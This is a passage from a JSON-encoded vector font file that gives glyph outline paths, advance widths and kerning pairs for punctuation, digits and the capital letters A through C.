"S":29,"R":261,"Q":-30,"P":267,"O":-47,"N":270,"M":280,"K":-80,"I":50,"G":-45,"F":64,"E":102,"D":253,"C":-67,"B":-34,"@":160,"?":376,";":175,":":106,"9":126,"8":39,"7":25,"6":-31,"5":-40,"4":363,"3":-143,"2":-86,"1":68,"0":-21,"\/":-23,".":90,"-":366,",":166,")":128,"&":59,"%":-23,"$":296,"#":189,"!":171}},"-":{"d":"569,-370v-31,-6,-80,-49,-113,-56v-21,-4,-44,-6,-67,-6v-44,0,-146,23,-306,69v-40,11,-68,-15,-63,-50v6,-41,250,-84,318,-88v98,-6,146,3,206,34v41,22,58,47,53,75","w":671,"k":{"\u00d0":-94,"\u00c1":109,"\u00c0":286,"\u00a2":-94,"\u00d1":-138,"\u00c9":664,"~":586,"z":258,"y":-65,"x":71,"w":-94,"v":-87,"u":-74,"t":-100,"s":-129,"r":-93,"p":-73,"o":-55,"n":-78,"m":-158,"l":-92,"k":-126,"j":140,"i":-83,"h":-92,"f":-64,"e":-45,"d":51,"c":-47,"b":-126,"a":49,"`":483,"Z":154,"Y":45,"X":57,"W":193,"V":262,"T":252,"S":-61,"R":71,"Q":-148,"O":-148,"N":130,"M":121,"L":72,"K":-170,"J":228,"I":121,"H":-88,"G":-146,"F":-132,"E":-85,"C":-140,"B":-32,"A":53,"@":-63,"?":147,";":202,":":95,"9":-113,"8":95,"7":93,"6":-92,"5":-156,"4":-105,"3":100,"2":273,"1":22,"0":-146,"\/":151,".":288,"-":-70,",":357,")":223,"(":-83,"&":69,"%":151,"$":-97}},".":{"d":"192,19v-33,1,-73,-29,-73,-62v0,-35,18,-52,54,-52v52,0,78,15,78,45v0,46,-20,69,-59,69","w":305,"k":{"\u00d0":147,"\u00c2":-43,"\u00c0":115,"\u00a2":85,"\u00d1":102,"\u00c9":-67,"~":252,"z":-164,"y":-42,"x":-136,"w":-131,"v":118,"u":-148,"t":168,"s":-124,"r":-125,"q":-182,"p":-120,"o":-126,"n":-156,"m":-190,"l":-85,"k":-124,"j":-235,"i":-90,"h":-129,"g":-141,"f":118,"e":-150,"d":-151,"c":-136,"b":-140,"a":-161,"`":236,"Z":-193,"Y":83,"X":-180,"W":73,"V":136,"U":-83,"T":116,"S":89,"R":74,"Q":-127,"P":79,"O":-129,"N":91,"M":69,"L":86,"K":-162,"J":-162,"I":120,"H":67,"G":-132,"F":93,"E":81,"D":70,"C":-156,"B":31,"A":-115,"@":225,"?":241,";":224,"9":198,"8":78,"7":-71,"6":-121,"5":-138,"4":179,"3":-256,"2":-187,"1":117,"0":-105,"\/":-120,"-":170,",":229,")":179,"(":-73,"&":-25,"%":-120,"$":101,"#":192,"!":256}},"\/":{"d":"-30,173v-14,34,-59,36,-58,-7v0,-8,2,-16,6,-24v75,-174,211,-385,408,-632v204,-257,384,-438,541,-544v26,-16,58,-7,71,19v11,19,7,35,-12,47v-154,104,-334,281,-542,529v-206,246,-348,449,-414,612","w":895,"k":{"\u00d0":339,"\u00c1":612,"\u00c2":369,"\u00c0":900,"\u00a2":-91,"\u00d1":314,"\u00c9":663,"~":136,"z":313,"y":271,"x":104,"w":306,"v":207,"u":293,"t":231,"s":338,"r":174,"q":471,"p":228,"o":360,"n":291,"m":195,"l":-81,"k":-76,"j":177,"i":-27,"h":-38,"g":462,"f":81,"e":392,"d":480,"c":388,"b":-31,"a":510,"`":-96,"Y":-135,"X":-69,"W":30,"V":-28,"U":-103,"T":-137,"S":65,"R":-124,"Q":-35,"P":-136,"O":-39,"M":-23,"K":-143,"I":-137,"G":45,"F":-68,"E":-53,"D":-43,"C":102,"A":290,"@":279,"?":46,";":587,":":509,"9":50,"8":63,"7":-96,"6":146,"4":62,"3":101,"\/":568,".":737,"-":369,",":795,")":106,"(":65,"&":212,"%":240,"$":-121,"#":109,"!":27}},"0":{"d":"292,168v-100,0,-185,-63,-255,-188v-56,-99,-85,-190,-88,-273v-4,-162,15,-308,57,-439v61,-188,165,-306,310,-353v20,-6,67,17,62,39v0,29,-25,51,-74,64v-89,23,-165,118,-224,288v-63,182,-72,409,5,595v55,133,131,200,232,200v106,0,196,-76,268,-230v64,-136,100,-252,100,-410v0,-114,-18,-214,-54,-300v-45,-106,-107,-159,-188,-159v-39,0,-70,37,-91,110v-17,17,-37,19,-49,-3v-6,-11,-7,-21,-5,-33v11,-73,91,-138,172,-139v94,0,170,63,229,190v118,254,83,533,-41,774v-93,178,-215,267,-366,267","w":844,"k":{"\u00d0":-86,"\u00c1":131,"\u00c2":37,"\u00c0":334,"\u00a2":-132,"\u00d1":-111,"\u00c9":79,"~":27,"z":-34,"y":-29,"x":-77,"w":-49,"v":-112,"u":-57,"t":-51,"s":-86,"r":-90,"q":-31,"p":-53,"o":-42,"n":-63,"m":-140,"l":-72,"k":-94,"j":61,"i":-51,"h":-65,"f":-74,"e":-49,"d":48,"c":-46,"b":-92,"`":98,"Z":26,"Y":-41,"W":-139,"V":-80,"U":-50,"T":-47,"S":-103,"R":-93,"Q":-109,"P":-89,"O":-113,"N":-112,"M":-118,"L":78,"K":-148,"J":155,"H":-50,"G":-106,"F":-100,"E":-96,"D":-129,"C":-99,"B":-159,"A":-48,"@":-29,"?":-44,";":190,":":104,"\/":97,".":153,"-":-63,",":223,")":211,"(":-48,"&":49,"%":78,"$":-87}},"1":{"d":"253,-1055v39,-1,82,32,80,71v0,15,-17,85,-52,210v-60,217,-90,418,-90,603v0,127,23,190,70,190r85,0v32,-2,115,57,109,90r-4,30v-21,-3,-44,-13,-68,-30v-16,-11,-39,-16,-68,-16v-60,0,-151,31,-274,92v-27,13,-44,20,-51,20v-28,0,-42,-14,-42,-43v0,-31,70,-73,209,-127v-49,-72,-43,-178,-43,-294v0,-151,22,-319,65,-504v23,-95,34,-160,35,-193v-19,5,-45,30,-76,77v-30,44,-54,66,-73,66v-31,0,-46,-13,-46,-40v0,-27,33,-68,99,-123v64,-53,109,-79,135,-79","w":518,"k":{"\u00d0":140,"\u00c1":35,"\u00c2":34,"\u00c0":298,"\u00a2":43,"\u00d1":115,"\u00c9":175,"~":177,"z":-46,"y":143,"x":-66,"v":79,"u":-50,"t":159,"r":-62,"p":-67,"n":-92,"m":-124,"k":-25,"j":115,"i":20,"h":-69,"g":140,"f":61,"d":-43,"a":-70,"`":116,"Z":-79,"X":-107,"W":21,"V":32,"S":44,"R":-27,"P":-24,"L":-108,"K":-69,"J":191,"I":-54,"H":-131,"C":-27,"B":-80,"A":-84,"@":184,"?":75,";":82,":":120,"\/":-68,".":249,"-":163,")":27,"(":26,"&":149,"%":-85,"$":23,"#":135,"!":81}},"2":{"d":"508,-1014v174,0,297,84,296,251v0,69,-45,149,-135,240v-120,122,-401,316,-566,446v-82,65,-121,116,-121,147v0,6,9,9,28,9v33,0,110,-20,233,-60v127,-42,219,-63,277,-63v79,0,195,56,195,131v0,25,-15,49,-44,72r-51,0v18,-43,27,-66,27,-69v0,-33,-48,-49,-145,-49v-137,-1,-289,76,-402,119v-43,15,-77,23,-102,23v-48,0,-106,-55,-106,-103v0,-50,45,-116,136,-197v36,-32,131,-107,285,-224v129,-99,223,-179,282,-240v82,-85,123,-159,123,-220v0,-93,-53,-139,-158,-139v-157,0,-338,63,-543,188v-41,25,-66,38,-73,38v-37,0,-55,-17,-55,-52v0,-23,10,-46,35,-59r63,-32v205,-105,378,-157,521,-157","w":895,"k":{"\u00d0":144,"\u00c1":168,"\u00c2":140,"\u00c0":413,"\u00a2":-85,"\u00d1":118,"\u00c9":174,"~":27,"z":57,"y":100,"x":-38,"w":78,"u":44,"t":160,"s":76,"q":56,"p":39,"o":88,"n":21,"k":-31,"j":133,"i":60,"g":112,"f":114,"e":66,"d":55,"c":82,"a":35,"`":74,"Z":21,"Y":-30,"W":-98,"V":-64,"U":-48,"T":-42,"S":-34,"R":-90,"P":-86,"N":-89,"M":-104,"K":-93,"J":304,"I":49,"H":-27,"F":-77,"E":-87,"D":-109,"C":25,"B":-130,"@":101,"?":-21,";":181,":":221,"\/":34,".":251,"-":174,",":139,")":127,"(":41,"&":172,"$":-77,"#":35,"!":75}},"3":{"d":"887,-857v0,-98,-119,-145,-229,-138v-184,12,-392,85,-498,175v-11,10,-24,15,-40,15v-35,0,-53,-15,-53,-44v0,-43,65,-91,194,-142v133,-53,264,-79,391,-79v215,0,322,74,322,221v0,97,-67,190,-202,279v-43,29,-122,73,-238,132v199,14,298,94,298,240v0,102,-63,197,-188,284v-115,81,-224,121,-328,121v-235,0,-387,-89,-456,-266v-12,-19,-8,-47,12,-53v14,-4,27,0,34,17v48,121,194,212,359,212v105,0,210,-29,316,-88v119,-66,179,-144,179,-234v0,-105,-110,-157,-329,-157v-3,-4,-149,29,-221,29v-26,0,-39,-10,-39,-30v0,-31,22,-54,67,-66v28,-7,72,-15,129,-33v114,-37,220,-90,320,-154v133,-86,200,-166,200,-241","w":944,"k":{"\u00d0":53,"\u00c1":117,"\u00c2":38,"\u00c0":351,"\u00a2":-190,"\u00d1":30,"\u00c9":28,"~":-72,"y":-26,"x":-150,"w":-35,"v":-74,"u":-61,"t":34,"s":-39,"r":-112,"q":-58,"p":-57,"o":-46,"n":-60,"m":-116,"l":-147,"k":-153,"i":-94,"h":-118,"g":-27,"f":-62,"e":-64,"c":-57,"b":-124,"a":-31,"`":-89,"Z":-52,"Y":-187,"X":-76,"W":-189,"V":-191,"U":-190,"T":-197,"S":-133,"R":-233,"Q":-125,"P":-229,"O":-129,"N":-209,"M":-217,"L":-29,"K":-218,"I":-144,"H":-29,"G":-100,"F":-211,"E":-219,"D":-239,"C":-94,"B":-238,"A":-48,"?":-153,";":209,":":142,"\/":50,".":101,"-":72,",":175,")":124,"(":-66,"&":33,"%":32,"$":-202,"#":-98,"!":-50}},"4":{"d":"689,-512v93,-16,161,23,206,96r-17,59v-43,-47,-99,-70,-168,-70v-3,0,-16,5,-41,15v-32,195,-26,228,-26,403v0,101,18,162,53,183v22,13,45,31,70,56v-41,8,-62,12,-63,12v-57,0,-102,-41,-129,-124v-37,-115,-37,-209,-12,-352v12,-72,18,-125,19,-158v-156,38,-229,59,-339,108v-39,17,-95,37,-165,67v-51,22,-82,34,-94,34v-41,0,-62,-17,-62,-50v-5,-4,92,-203,87,-193v58,-145,108,-271,126,-381r25,-150v17,-88,41,-132,70,-132v34,0,51,23,51,68v-2,134,-177,615,-237,716v85,-21,497,-161,553,-194v15,-87,37,-191,68,-310v42,-163,75,-244,100,-244v35,0,53,17,53,51v0,25,-21,103,-63,233v-38,117,-60,203,-65,257","w":906,"k":{"\u00d0":-154,"\u00c1":80,"\u00c0":255,"\u00a2":-124,"\u00d1":-174,"\u00c9":141,"~":91,"z":31,"y":-71,"w":-92,"v":-87,"u":-100,"t":-95,"s":-129,"r":-115,"q":-28,"p":-99,"o":-82,"n":-105,"m":-183,"l":-115,"k":-143,"j":44,"i":-98,"h":-115,"g":-22,"f":-86,"e":-74,"d":44,"c":-76,"b":-143,"`":22,"Z":45,"Y":-86,"X":-25,"W":-55,"V":-48,"U":-73,"T":-90,"S":-85,"R":-114,"Q":-160,"P":-111,"O":-162,"N":-62,"M":-74,"K":-192,"J":-298,"I":-84,"H":-102,"G":-148,"F":-150,"E":-93,"D":-97,"C":-149,"B":-96,"A":-25,"@":-69,";":124,":":75,".":213,"-":-130,",":149,")":81,"(":-96,"&":37,"$":-116,"!":-25}},"5":{"d":"674,-1098v70,0,132,49,133,114v0,30,-12,47,-36,52v-24,5,-37,-18,-30,-41v1,-3,1,-7,1,-10v0,-26,-33,-39,-99,-39v-99,0,-234,39,-405,116v-33,130,-83,254,-148,373v-9,17,-16,30,-20,39v182,-104,336,-156,463,-156v181,0,329,74,329,240v0,29,-4,59,-13,92v-39,148,-141,274,-307,377v-148,93,-291,139,-429,139v-146,0,-208,-58,-181,-174v5,-19,52,-89,73,-89v26,0,34,17,24,52v-17,12,-30,34,-30,64v0,43,41,65,122,65v120,0,248,-45,385,-135v145,-95,231,-201,262,-315v39,-142,-67,-238,-203,-238v-115,0,-280,62,-495,186v-44,25,-72,38,-83,38v-34,0,-51,-11,-51,-34v0,-15,15,-47,45,-95v66,-104,117,-238,155,-386v-19,12,-54,28,-69,28v-36,0,-50,-18,-47,-51v5,-50,331,-172,399,-185v80,-16,165,-27,255,-27","w":916,"k":{"\u00d0":-115,"\u00c1":110,"\u00c0":309,"\u00a2":-93,"\u00d1":-138,"\u00c9":88,"~":660,"z":-23,"y":-32,"x":35,"w":-53,"v":-82,"u":-79,"t":-44,"s":-96,"r":-79,"q":-29,"p":-61,"o":-60,"n":-88,"m":-162,"l":-65,"k":-94,"j":98,"i":-46,"h":-66,"f":-80,"e":-60,"d":51,"c":-63,"b":-95,"`":103,"Z":50,"Y":-54,"W":34,"V":42,"U":-28,"T":-56,"S":-76,"R":-59,"Q":-110,"P":-67,"O":-114,"N":69,"M":43,"L":87,"K":-142,"J":61,"I":-50,"H":-49,"G":-102,"F":-101,"E":-42,"D":25,"C":-104,"A":-53,"?":124,";":182,":":88,"\/":117,".":162,"-":-91,",":227,")":163,"(":-44,"&":50,"%":100,"$":-68,"!":25}},"6":{"d":"693,-977v-17,0,-124,-33,-152,-33v-56,0,-123,43,-202,130v-67,74,-116,146,-147,216v-93,211,-138,374,-135,489v5,189,58,283,161,283v47,0,103,-31,170,-94v59,-55,102,-109,131,-164v63,-120,93,-221,91,-303v-3,-99,-45,-149,-126,-149v-81,0,-160,54,-237,163v-73,103,-108,199,-105,287v-6,30,40,103,44,119v1,22,-11,33,-35,33v-41,0,-80,-116,-80,-162v0,-115,36,-226,116,-333v87,-116,187,-174,302,-174v128,0,201,97,204,226v3,124,-41,255,-131,394v-100,153,-210,230,-333,230v-95,0,-177,-61,-204,-135v-27,-72,-42,-154,-42,-246v0,-170,40,-333,121,-490v50,-97,115,-185,194,-264v102,-102,197,-154,287,-154v58,0,161,36,161,87v0,29,-16,44,-53,44","w":777,"k":{"\u00d0":-85,"\u00c1":127,"\u00c2":34,"\u00c0":328,"\u00a2":-88,"\u00d1":-109,"\u00c9":78,"~":467,"w":-35,"v":-76,"u":-55,"t":-30,"s":-76,"r":-61,"q":-22,"p":-44,"o":-38,"n":-62,"m":-138,"l":-63,"k":-79,"j":104,"i":-30,"h":-50,"f":-64,"e":-43,"d":61,"c":-42,"b":-79,"`":50,"Z":29,"Y":-112,"X":-70,"W":-48,"V":23,"U":-64,"T":-93,"S":-70,"R":-79,"Q":-94,"P":-94,"O":-98,"N":80,"M":36,"L":35,"K":-127,"J":-23,"I":-124,"H":-36,"G":-92,"F":-86,"E":-26,"D":40,"C":-86,"A":-38,"?":143,";":199,":":112,"\/":112,".":151,"-":-61,",":220,")":75,"(":-31,"&":63,"%":95,"$":-62,"#":23,"!":40}},"7":{"d":"608,-990r-8,1v-63,7,-174,17,-333,23v-203,8,-304,-20,-304,-76v0,-30,18,-45,53,-45v33,0,130,31,161,31v211,0,396,3,553,-23v50,-8,61,32,43,68v-102,44,-140,92,-246,227v-163,210,-353,562,-385,806v-4,23,-9,59,-15,110v-41,47,-92,28,-92,-51v0,-139,69,-328,206,-567v121,-212,244,-380,367,-504","w":730,"k":{"\u00d0":252,"\u00c1":488,"\u00c2":315,"\u00c0":688,"\u00a2":-79,"\u00d1":228,"\u00c9":449,"~":157,"z":246,"y":239,"x":88,"w":243,"v":149,"u":243,"t":241,"s":256,"r":133,"q":339,"p":189,"o":297,"n":223,"m":141,"l":-100,"k":-95,"j":302,"h":-55,"g":363,"f":76,"e":320,"d":388,"c":318,"b":-42,"a":368,"`":-57,"Y":-138,"X":-121,"W":40,"U":-91,"T":-119,"S":83,"R":-105,"Q":-36,"P":-120,"O":-39,"K":-159,"J":-72,"I":-163,"H":-33,"G":44,"F":-51,"E":-41,"D":-37,"C":113,"A":291,"@":250,"?":53,";":500,":":425,"\/":383,".":522,"-":282,",":512,")":25,"(":66,"&":239,"%":247,"$":-105,"#":110}},"8":{"d":"694,-749v23,-2,45,49,45,75v0,47,-62,122,-185,227r-16,14v74,35,126,71,155,108v24,31,36,67,36,107v0,105,-54,190,-162,256v-89,55,-181,82,-278,82v-153,0,-230,-49,-230,-148v0,-85,102,-210,305,-374v-55,-27,-241,-74,-296,-100v-100,-47,-152,-97,-152,-158v0,-65,57,-135,172,-212v91,-61,205,-117,341,-168v121,-46,203,-69,248,-69v117,0,208,92,206,208v0,19,-8,55,-25,110v-21,69,-44,103,-67,103v-35,0,-53,-14,-53,-42v0,-16,13,-44,38,-84v25,-40,37,-76,37,-106v0,-68,-42,-102,-127,-102v-101,0,-238,44,-410,133v-183,95,-275,180,-275,255v0,29,95,70,284,124r154,50v18,5,205,-172,216,-190v16,-25,18,-18,11,-54v-2,-10,0,-21,5,-32v8,-9,16,-13,23,-13xm456,-374v-15,0,-72,48,-169,144v-103,101,-155,170,-155,205v0,49,57,73,171,73v57,0,127,-27,212,-80v96,-60,144,-121,144,-185v0,-29,-29,-63,-89,-103v-54,-36,-93,-54,-114,-54","w":832,"k":{"\u00d0":31,"\u00c1":113,"\u00c2":28,"\u00c0":349,"\u00a2":-203,"\u00c9":26,"~":-84,"y":-43,"x":-162,"w":-44,"v":-75,"u":-69,"t":24,"s":-51,"r":-71,"q":-70,"p":-73,"o":-55,"n":-68,"m":-126,"l":-163,"k":-170,"i":-116,"h":-131,"g":-43,"f":-73,"e":-73,"c":-66,"b":-136,"a":-36,"`":-121,"Z":-86,"Y":-227,"X":-126,"W":-202,"V":-201,"U":-214,"T":-226,"S":-148,"R":-257,"Q":-142,"P":-254,"O":-142,"N":-217,"M":-231,"L":-53,"K":-232,"J":-79,"I":-198,"H":-59,"G":-120,"F":-232,"E":-237,"D":-249,"C":-105,"B":-251,"A":-59,"?":-163,";":204,":":139,"\/":47,".":100,"-":50,",":176,")":28,"(":-82,"&":24,"%":28,"$":-219,"#":-109,"!":-63}},"9":{"d":"187,-201v-3,0,-13,-3,-19,-5v-70,0,-122,-40,-156,-119v-23,-54,-34,-112,-34,-175v0,-115,43,-240,129,-377v95,-150,194,-225,298,-225v103,0,176,58,224,173v40,96,58,233,50,376v-11,172,-58,337,-142,494v-105,196,-230,294,-374,294v-28,0,-62,-10,-103,-29v-51,-25,-77,-53,-77,-86v0,-37,35,-36,54,-17v43,42,83,62,117,62v143,0,260,-122,350,-367v66,-180,99,-334,99,-463v0,-69,-9,-136,-29,-202v-33,-108,-86,-162,-157,-162v-24,0,-68,25,-133,72v-122,87,-211,292,-210,501v0,122,40,183,120,183v81,0,156,-56,225,-167v63,-102,95,-201,95,-296v0,-62,-17,-101,-52,-118v-24,-11,-19,-37,2,-52v12,-9,22,-12,31,-8v76,43,90,96,89,227v0,91,-36,190,-107,297v-83,126,-180,189,-290,189","w":762,"k":{"\u00d0":-71,"\u00c1":149,"\u00c2":52,"\u00c0":349,"\u00a2":-128,"\u00d1":-96,"\u00c9":97,"~":21,"z":-24,"x":-79,"w":-36,"v":-103,"u":-41,"t":-37,"s":-70,"r":-84,"p":-38,"o":-26,"n":-51,"m":-127,"l":-65,"k":-85,"j":71,"i":-39,"h":-55,"f":-61,"e":-32,"d":65,"c":-29,"b":-81,"`":56,"Z":40,"Y":-63,"W":-131,"V":-88,"U":-75,"T":-78,"S":-96,"R":-118,"Q":-98,"P":-114,"O":-102,"N":-118,"M":-122,"L":79,"K":-140,"J":-48,"I":-32,"H":-39,"G":-83,"F":-101,"E":-110,"D":-140,"C":-85,"B":-162,"A":-32,"?":-54,";":201,":":118,"\/":108,".":171,"-":-48,",":238,")":205,"(":-36,"&":64,"%":91,"$":-99,"!":24}},":":{"d":"251,-408v-32,1,-73,-30,-73,-62v0,-35,18,-52,53,-52v53,0,79,15,79,45v0,46,-20,69,-59,69xm187,60v-33,1,-73,-30,-73,-62v0,-35,18,-52,53,-52v52,0,78,15,78,44v0,47,-19,70,-58,70","w":299,"k":{"\u00d0":-162,"\u00c2":-43,"\u00c0":146,"\u00a2":-176,"\u00d1":-186,"\u00c9":-61,"~":252,"z":-122,"y":-28,"x":-116,"w":-156,"v":-161,"u":-136,"t":-131,"s":-155,"r":-160,"q":-156,"p":-135,"o":-114,"n":-147,"m":-220,"l":-153,"k":-184,"j":-229,"i":-142,"h":-153,"g":-109,"f":-56,"e":-131,"d":-129,"c":-116,"b":-183,"a":-136,"`":236,"Z":-157,"Y":95,"X":-157,"W":81,"V":134,"U":-70,"T":119,"S":-154,"R":80,"Q":-204,"P":83,"O":-204,"N":101,"M":79,"L":-81,"K":-230,"J":-148,"I":-50,"H":-116,"G":-202,"F":-150,"E":-121,"D":72,"C":-196,"B":-124,"A":-112,"@":-106,"?":168,";":252,":":26,"9":-139,"8":-91,"7":-54,"6":-151,"5":-133,"4":-106,"3":-142,"2":-150,"1":122,"0":-202,"\/":-106,"-":-132,",":56,")":204,"(":-141,"%":-105,"$":-155,"#":-91,"!":-59}},";":{"d":"340,-430v-32,0,-73,-29,-73,-62v0,-35,18,-52,53,-52v53,0,79,15,79,45v0,46,-20,69,-59,69xm109,190v-30,11,-45,4,-45,-21v0,-14,10,-25,29,-32v52,-22,104,-120,113,-192v3,-21,24,-32,63,-32v29,0,44,13,43,39v-1,35,-23,79,-66,131v-45,54,-90,90,-137,107","w":446,"k":{"\u00d0":-75,"\u00c1":107,"\u00c2":36,"\u00c0":322,"\u00a2":-108,"\u00d1":-103,"~":448,"z":-32,"y":-25,"x":-23,"w":-80,"v":-95,"u":-58,"t":-49,"s":-74,"r":-90,"q":-54,"p":-61,"o":-31,"n":-71,"m":-145,"l":-79,"k":-103,"j":-46,"i":-65,"h":-79,"f":37,"e":-44,"d":-35,"c":-32,"b":-104,"a":-44,"`":431,"Z":-53,"Y":86,"X":-62,"W":264,"V":320,"U":22,"T":304,"S":-92,"R":86,"Q":-120,"P":26,"O":-125,"N":284,"M":274,"K":-156,"J":33,"I":41,"H":-39,"G":-113,"F":-23,"E":-31,"C":-113,"B":-30,"@":-33,"?":348,";":179,":":101,"9":-72,"8":-40,"7":40,"6":-71,"5":-67,"3":-73,"2":-54,"1":32,"0":-124,".":85,"-":-45,",":130,")":133,"(":-63,"&":88,"$":-81}},"<":{},"=":{},">":{},"?":{"d":"281,-132v-63,0,-113,-57,-112,-118v0,-55,46,-128,148,-207r275,-212v99,-80,148,-144,148,-193v0,-89,-68,-134,-203,-134v-72,0,-154,22,-246,67v-61,29,-130,71,-207,124v-64,45,-98,67,-101,67v-29,0,-44,-16,-44,-48v0,-34,56,-83,168,-147v96,-55,168,-90,216,-103v73,-20,145,-30,216,-30v186,0,279,69,279,208v0,80,-66,173,-199,278v-32,25,-86,65,-162,119v-142,101,-213,174,-213,220v0,22,10,34,31,37v36,5,54,16,54,33v0,26,-16,39,-48,39xm324,85v0,20,-49,50,-70,50v-41,0,-62,-15,-62,-46v0,-37,22,-56,65,-56v45,0,67,17,67,52","w":855,"k":{"\u00d0":254,"\u00c1":486,"\u00c2":214,"\u00c0":832,"\u00a2":-101,"\u00d1":228,"\u00c9":930,"z":176,"y":116,"x":-31,"w":167,"v":61,"u":142,"t":148,"s":192,"r":21,"q":312,"p":72,"o":213,"n":155,"m":45,"l":-42,"k":-51,"j":105,"g":297,"f":98,"e":240,"d":354,"c":237,"a":344,"`":-26,"Z":42,"Y":-95,"X":22,"W":-86,"V":-91,"U":-88,"T":-95,"S":-23,"R":-131,"Q":-25,"P":-127,"O":-25,"N":-101,"M":-123,"L":73,"K":-113,"J":93,"I":-48,"H":72,"F":-112,"E":-121,"D":-132,"C":41,"B":-129,"A":270,"@":133,"?":-46,";":460,":":401,"8":-68,"6":78,"4":81,"3":66,"2":-104,"1":-28,"0":-37,"\/":340,".":1003,"-":284,",":500,")":219,"(":39,"&":154,"%":247,"$":-118,"!":56}},"@":{"d":"874,-300v0,-31,-13,-61,-16,-93v-3,-30,34,-32,45,-6v63,141,28,260,-94,341v-179,119,-444,92,-608,-37v-110,-87,-167,-192,-167,-323v0,-119,51,-227,154,-324v100,-95,208,-142,324,-142v78,0,152,24,218,76v89,70,141,149,141,286v0,90,-24,165,-72,225v-52,65,-115,85,-188,59v-42,-15,-63,-65,-62,-148v-117,146,-210,219,-278,219v-37,0,-56,-23,-56,-68v0,-85,56,-194,169,-327v113,-133,197,-182,251,-147v17,11,26,34,26,67v0,42,-15,63,-44,67v-21,3,-42,-14,-33,-34v7,-18,11,-34,10,-48v0,-4,2,-6,5,-7v-38,7,-103,69,-193,185v-90,116,-135,195,-135,237v0,14,6,21,19,21v29,0,82,-46,158,-138v41,-51,117,-125,125,-192v3,-21,15,-32,37,-32v30,0,42,14,37,43v-21,107,-32,172,-32,193v2,46,7,65,43,64v44,0,83,-31,110,-95v89,-210,-38,-449,-256,-448v-99,0,-192,42,-278,126v-86,84,-128,179,-128,282v0,216,213,379,437,379v169,0,331,-104,331,-261","w":1024,"k":{"\u00d0":-51,"\u00c1":133,"\u00c0":334,"\u00a2":-60,"\u00d1":-72,"\u00c9":77,"~":143,"y":-56,"w":-45,"v":-44,"u":-73,"t":-21,"s":-74,"r":-60,"q":-67,"p":-56,"o":-60,"n":-74,"m":-138,"l":-57,"k":-93,"j":115,"i":-45,"h":-68,"g":-50,"f":-81,"e":-73,"c":-70,"b":-100,"a":-22,"`":394,"Y":44,"X":-25,"W":-82,"V":35,"T":288,"S":-38,"R":100,"Q":-110,"P":50,"O":-110,"N":-24,"M":-32,"L":89,"K":-135,"J":282,"I":160,"H":-25,"G":-112,"F":-94,"E":-26,"C":-112,"B":-82,"A":-66,"?":84,";":233,":":170,"9":-34,"8":-52,"7":63,"6":-67,"5":-54,"4":-93,"3":-22,"1":52,"0":-107,"\/":73,".":151,"-":-32,",":202,")":191,"(":-45,"&":24,"%":63,"#":56,"!":41}},"A":{"d":"1096,61v0,34,-71,63,-108,62v-121,-2,-200,-182,-237,-544v-106,-8,-170,8,-324,41v-116,25,-175,43,-178,51r-107,252r-81,206v-26,64,-54,96,-85,96v-35,0,-52,-19,-52,-58v0,-17,53,-128,158,-334v27,-53,46,-92,57,-119v-36,14,-67,30,-94,48v-11,7,-25,11,-41,11v-33,0,-49,-17,-49,-50v0,-23,32,-49,98,-71r130,-43r57,-121v38,-85,95,-213,178,-379v78,-157,159,-234,234,-234v65,0,117,97,130,162v18,89,36,241,51,457v131,11,196,57,196,137v0,29,-12,49,-35,61v-44,23,-56,-22,-35,-61v0,-36,-43,-54,-130,-54v8,0,13,8,16,23v43,303,90,454,141,454v30,0,48,-34,74,-34v24,0,36,12,36,41xm714,-826v-19,-145,-50,-217,-83,-217v-33,0,-94,93,-183,280v-31,65,-79,176,-146,333v160,-46,308,-74,443,-84v-5,-66,-12,-170,-31,-312","w":1123,"k":{"\u00d0":-68,"\u00c0":303,"\u00a2":-28,"\u00d1":-85,"\u00c9":69,"~":243,"z":-106,"x":-109,"w":-76,"u":-119,"t":-23,"s":-80,"r":-115,"q":-68,"p":-95,"o":-71,"n":-149,"m":-179,"l":-41,"k":-72,"j":78,"i":-38,"h":-101,"g":41,"f":-58,"e":-90,"d":-76,"c":-73,"b":-70,"a":-122,"`":261,"Z":-111,"Y":41,"X":-137,"W":68,"V":110,"U":-54,"T":112,"R":75,"Q":-82,"P":53,"O":-89,"N":78,"M":77,"L":-126,"K":-119,"J":181,"I":-83,"H":-122,"G":-65,"F":-70,"D":48,"C":-77,"B":-109,"A":-90,"?":117,";":70,":":41,"9":-40,"7":-30,"6":-60,"5":-116,"4":-21,"3":-90,"2":-143,"1":-64,"0":-80,"\/":-81,".":142,"-":-46,",":21,")":21,"&":85,"%":-99,"$":-20,"#":89,"!":48}},"B":{"d":"803,-937v0,-68,-91,-100,-170,-100v-190,0,-398,105,-623,314v-47,43,-75,65,-86,65v-33,0,-49,-18,-49,-54v0,-25,41,-70,122,-135v219,-174,428,-261,625,-261v186,0,279,64,279,192v0,87,-79,197,-238,330v118,-21,238,-22,333,26v72,36,108,85,108,150v0,111,-88,230,-263,357v-157,113,-296,178,-415,194v-145,19,-229,29,-254,29v-135,0,-202,-45,-202,-136v0,-57,23,-100,69,-129v47,3,31,-2,47,39v-29,33,-44,63,-44,90v0,31,44,46,132,46v132,0,276,-33,432,-98v76,-31,162,-88,257,-169v109,-92,163,-166,163,-221v0,-69,-68,-103,-203,-103v-99,0,-201,17,-302,55v-58,22,-192,95,-235,95v-39,0,-58,-7,-58,-21v0,-19,31,-47,92,-82v322,-183,483,-340,483,-473xm240,-752v-70,125,-100,305,-100,532v0,97,35,155,104,175v29,26,19,60,-31,60v-49,0,-90,-38,-121,-115v-25,-60,-37,-117,-37,-172v0,-71,15,-179,45,-326v35,-175,71,-262,108,-262v59,-1,57,63,32,108","w":1171,"k":{"\u00d0":-102,"\u00c1":134,"\u00c2":40,"\u00c0":336,"\u00a2":-84,"\u00d1":-125,"\u00c9":180,"~":276,"y":-20,"x":63,"w":-41,"v":-51,"u":-54,"t":-40,"s":-80,"r":-63,"p":-43,"o":-38,"n":-62,"m":-136,"l":-55,"k":-83,"j":103,"i":-41,"h":-54,"f":-68,"e":-36,"d":80,"c":-37,"b":-83,"a":37,"`":199,"Z":106,"Y":68,"X":38,"W":124,"V":102,"U":37,"T":66,"S":-53,"R":35,"Q":-98,"P":39,"O":-103,"N":93,"M":81,"L":98,"K":-132,"J":211,"I":89,"H":-39,"G":-96,"F":-90,"E":-29,"D":33,"C":-89,"A":-34,"?":138,";":208,":":110,"9":-48,"7":106,"6":-43,"5":-73,"4":-48,"3":69,"2":79,"1":53,"0":-97,"\/":153,".":254,"-":-78,",":316,")":234,"(":-34,"&":67,"%":135,"$":-64,"#":21,"!":34}},"C":{"d":"757,-1054v2,32,-33,61,-63,60v-3,0,-22,-8,-55,-23v-33,-15,-61,-23,-84,-23v-110,0,-227,103,-352,308v-1